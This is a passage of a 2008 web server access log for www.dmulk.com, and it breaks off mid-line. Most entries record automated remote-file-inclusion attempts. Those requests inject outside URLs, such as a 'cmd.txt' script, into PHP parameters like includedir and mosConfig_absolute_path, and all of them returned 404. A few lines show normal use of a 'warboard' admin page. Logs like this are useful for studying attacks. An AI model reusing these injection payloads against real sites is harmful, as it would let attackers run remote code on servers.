76.3.3.124 - - [23/Jan/2008:09:59:23 -0800] "GET /logs/access_071109.log HTTP/1.1" 200 29983 "http://www.google.com/ie?q=38.105.83.12&hl=en" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:10:00:40 -0800] "GET /logs/access_071230.log/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:10:00:40 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:10:00:40 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:10:01:21 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:10:01:21 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:10:01:22 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.148.17 - - [23/Jan/2008:10:01:42 -0800] "GET /logs/access_080101.log/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.57.148.17 - - [23/Jan/2008:10:02:02 -0800] "GET /logs/access_080101.log/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:10:02:47 -0800] "GET /logs/access_080101.log/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.56.111.194 - - [23/Jan/2008:10:05:09 -0800] "GET /index.php?sub=http://www.top-pharma.info/rize2/kepek_rize2/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
195.56.111.194 - - [23/Jan/2008:10:05:09 -0800] "GET /logs/index.php?sub=http://www.top-pharma.info/rize2/kepek_rize2/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
201.28.106.195 - - [23/Jan/2008:10:05:33 -0800] "GET /logs/access.log//com_swmenupro/ImageManager/Classes/ImageManager.php=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.78.173.10 - - [23/Jan/2008:10:05:42 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://oharano.net/modules/mod_stat/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.8.232.250 - warboard [23/Jan/2008:10:06:02 -0800] "GET /warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=579 HTTP/1.1" 200 7663 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [23/Jan/2008:10:06:12 -0800] "POST /warboard/index.php?table_name=warboard_main&page=0&function=update&where_field=dataid&where_value=579 HTTP/1.1" 302 2906 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=579" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [23/Jan/2008:10:06:12 -0800] "GET /warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=579&just_updated=1 HTTP/1.1" 200 7699 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=579" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [23/Jan/2008:10:06:13 -0800] "GET /warboard/index.php?table_name=warboard_main HTTP/1.1" 200 32998 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=579&just_updated=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [23/Jan/2008:10:06:16 -0800] "GET /warboard/index.php?table_name=warboard_main&function=se